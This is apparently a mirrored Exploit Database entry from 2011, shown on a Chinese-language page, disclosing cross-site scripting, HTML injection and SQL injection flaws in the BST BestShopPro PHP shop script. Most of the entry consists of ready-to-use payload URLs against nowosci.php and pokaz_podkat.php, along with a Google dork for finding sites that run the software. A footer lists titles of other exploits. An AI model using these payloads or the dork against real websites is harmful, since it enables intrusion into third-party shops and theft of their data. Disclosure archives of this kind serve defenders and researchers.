BST (BestShopPro) – ‘nowosci.php’ Multiple Vulnerabilities

Exploit Database
97 阅读

作者： CoBRa_21

日期： 2011-11-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18063/

################################################################################################
#Exploit Title: BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
#
#Author : CoBRa_21 
#
#E-Mail : uyku_cu [at] windowslive.com
#
#Google Dork : "Powered By BST"
#
#Script Page : http://www.bst.pl
################################################################################################
#
#XSS:
#
#http://127.0.0.1/nowosci.php?a=1&str=<script>alert(/CoBRa_21/)</script>
#
#HTML:
#
#http://127.0.0.1/nowosci.php?a=1&str=<font color=red size=15>CoBRa_21</font>
#
#SQL :
#
#http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL)
#
################################################################################################

last Exploits
BST (BestShopPro) – ‘nowosci.php’ Multiple Vulnerabilities的更多信息

Openlitespeed WebServer 1.7.8 – Command Injection (Authenticated) (2)：
Markdown Explorer 0.1.1 – Persistent Cross-Site Scripting：
WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 – Arbitrary File Upload (1)：
Max’s Photo Album – Arbitrary File Upload：
DELTAScripts PHP Links – Multiple SQL Injections：
Enorth Webpublisher CMS – ‘thisday’ SQL Injection：
Library Management System 3.0 – “Add Category” Stored XSS：
RaakCMS – Multiple Vulnerabilities：